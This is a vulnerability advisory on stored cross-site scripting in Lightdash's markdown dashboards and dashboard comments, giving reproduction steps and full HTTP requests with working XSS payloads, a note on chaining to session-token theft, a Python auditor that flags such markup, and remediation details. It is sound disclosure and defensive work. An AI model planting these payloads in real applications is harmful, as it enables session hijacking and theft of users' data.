Summary
Multiple stored cross-site scripting (“XSS”) vulnerabilities in the markdown dashboard and dashboard comment functionality of Lightdash version 0.1024.6 allow remote authenticated threat actors to inject malicious scripts into vulnerable web pages. A threat actor could potentially exploit this vulnerability to store malicious JavaScript which executes in the context of a user’s session with the application.
Severity
HIGH - Exploitation of this vulnerability could allow a threat actor to impersonate a user through request forgery, session hijacking, or an account takeover. In addition, a threat actor could access or exfiltrate any data the victim user can access.
Proof of Concept
Multiple instances of stored XSS exist within the affected version:
Instance 1: Markdown Dashboard
Affected Endpoint (Storage): PATCH /api/v1/dashboards/<DashboardIdentifier>
Affected Endpoint (Execution): GET /projects/<ProjectIdentifier>/dashboards/<DashboardIdentifier>/view
Affected Parameters: content
Reproduction Steps:
- Log in as a user with the permissions to create a new dashboard and create a markdown dashboard
- Edit the dashboard and insert the payload <iframe src="javascript:alert(document.domain)">. Save the dashboard
- Observe payload execution when the dashboard is loaded.
- Navigate away, return to the dashboard, and observe that the payload is still executed and was stored by the application.
An example request to store an XSS payload in the markdown dashboard is shown below. The XSS will be triggered when viewing the injected dashboard.
PATCH /api/v1/dashboards/<DashboardIdentifier> HTTP/2
Host: lightdash-host
...
Accept-Language: en-US,en;q=0.9
Priority: u=1, i
{"tiles":[{"uuid":"<UniqueIdentifier>","x":0,"y":0,"h":9,"w":15,"type":"markdown","properties":{"title":"title","hideTitle":false,"content":"start\n<iframe src=\"javascript:alert(document.domain)\" style=\"position: absolute;width:0;height:0;border:0;\">frame</iframe>\nend\n"}}],"filters":{"dimensions":[],"metrics":[],"tableCalculations":[]},"name":"my dashboard"}
Instance 2: Dashboard Comments
Affected Endpoint (Storage): POST /api/v1/comments/dashboards/<DashboardIdentifier>/<UniqueIdentifier>
Affected Endpoint (Execution): GET /projects/<ProjectIdentifier>/<DashboardIdentifier>/view
Affected Parameters: textHtml
Reproduction Steps:
- Log into the application and navigate to a shared dashboard
- Use the dashboard comment functionality to add a new comment. Optional: use the comment @ functionality to target a potential victim account
- Intercept the request with Burp Suite and insert the payload <details/open/ontoggle=alert(document.domain)> into the value of textHtml
- Forward the request and observe that the payload executes when viewing the dashboard comments
An example HTTP request to store the XSS payload in a comment is shown below. After submitting the comment, the XSS will be triggered when viewing dashboard comments.
POST /api/v1/comments/dashboards/<DashboardIdentifier>/<UniqueIdentifier> HTTP/2
Host: lightdash-host
...
Accept-Language: en-US,en;q=0.9
Priority: u=1, i
{"text":"@<user>","textHtml":"<p><strong><span style=\"color: #228be6; font-weight: 500;\">@user</span></strong> test<details/open/ontoggle=alert(document.domain)></p>","mentions":["<MentionIdentifier>"]}
Further Analysis
A threat actor needs permissions to create dashboards and make dashboard comments, such as those granted with the Administrator or Editor roles. The threat actor must only identify the affected scope, submit the XSS payload, and wait for an unsuspecting user to visit the affected page. The application contains functionality to tag users and notify them of new comments, which increases the likelihood of a user browsing to a page and triggering payload execution.
This vulnerability can be used to force a user to export a dashboard, trigger CVE-2024-6586, and leak the user’s session token to a threat actor, resulting in session takeover.
Vendor Analysis
The vendor determined that the root cause of this issue was that the markdown and comment components execute scripts contained in user-supplied content. The issue was remediated in version 0.1042.2.
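As an added example, not code from this advisory or from Lightdash: a defender-side audit in Python that parses markdown tile content and comment textHtml with the standard-library HTML parser and flags the constructs both payloads above rely on (active-content tags, on* event-handler attributes, and javascript:/data: URLs). It is intended for triaging content already stored in an instance before the fixed version's sanitization is in place; the sample bodies are constructed after the two requests shown above, and the function names are assumptions.

```python
from html.parser import HTMLParser

# Tags and URL-bearing attributes that should never reach a rendered tile or
# comment; event-handler attributes are matched by their "on" prefix.
DANGEROUS_TAGS = {"script", "iframe", "object", "embed"}
URL_ATTRS = {"src", "href", "action", "formaction"}
DANGEROUS_SCHEMES = ("javascript:", "data:", "vbscript:")


class ActiveContentAuditor(HTMLParser):
    """Collects (tag, reason) findings for markup that can execute script."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in DANGEROUS_TAGS:
            self.findings.append((tag, "active-content tag"))
        for name, value in attrs:          # names are already lower-cased
            if name.startswith("on"):
                self.findings.append((tag, f"event handler {name}"))
            elif name in URL_ATTRS and value is not None:
                # Browsers drop tabs/newlines inside URLs; conservatively drop
                # all whitespace before checking the scheme.
                url = "".join(value.split()).lower()
                if url.startswith(DANGEROUS_SCHEMES):
                    self.findings.append((tag, f"{name} uses {url.split(':')[0]}: URL"))


def audit_html(fragment: str) -> list:
    auditor = ActiveContentAuditor()
    auditor.feed(fragment)
    auditor.close()
    return auditor.findings


def audit_dashboard_body(body: dict) -> list:
    """Audit every markdown tile in a PATCH /api/v1/dashboards/<id> body."""
    return [f for t in body.get("tiles", []) if t.get("type") == "markdown"
            for f in audit_html(t.get("properties", {}).get("content", ""))]


def audit_comment_body(body: dict) -> list:
    """Audit the textHtml field of a POST /api/v1/comments/... body."""
    return audit_html(body.get("textHtml", ""))


# Constructed samples mirroring the two request bodies in the advisory.
DASHBOARD_BODY = {"tiles": [{"uuid": "tile-1", "type": "markdown", "properties": {
    "content": 'start\n<iframe src="javascript:alert(document.domain)" '
               'style="width:0;height:0;border:0;">frame</iframe>\nend\n'}}]}
COMMENT_BODY = {"text": "@user", "textHtml": '<p><strong>@user</strong> test'
                '<details/open/ontoggle=alert(document.domain)></p>'}
BENIGN_COMMENT = {"textHtml": '<p><a href="https://example.com">docs</a> <b>ok</b></p>'}
```

Running the three samples through audit_dashboard_body / audit_comment_body reports the iframe (tag and javascript: src) and the details ontoggle handler, and nothing for the benign comment.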
Remediation Information
Remediated Version: https://github.com/lightdash/lightdash/releases/tag/0.1042.2
Remediation patch 1
Description: sanitizes HTML for markdown tiles
Git Patch: https://patch-diff.githubusercontent.com/raw/lightdash/lightdash/pull/9510.patch
GitHub Pull Request: lightdash/lightdash#9510
Remediation patch 2
Description: sanitizes HTML for comments
Git Patch: https://patch-diff.githubusercontent.com/raw/lightdash/lightdash/pull/9359.patch
GitHub Pull Request: lightdash/lightdash#9359
Timeline
Date reported: 03/07/2024
Date fixed: 03/26/2024
Date disclosed: 08/30/2024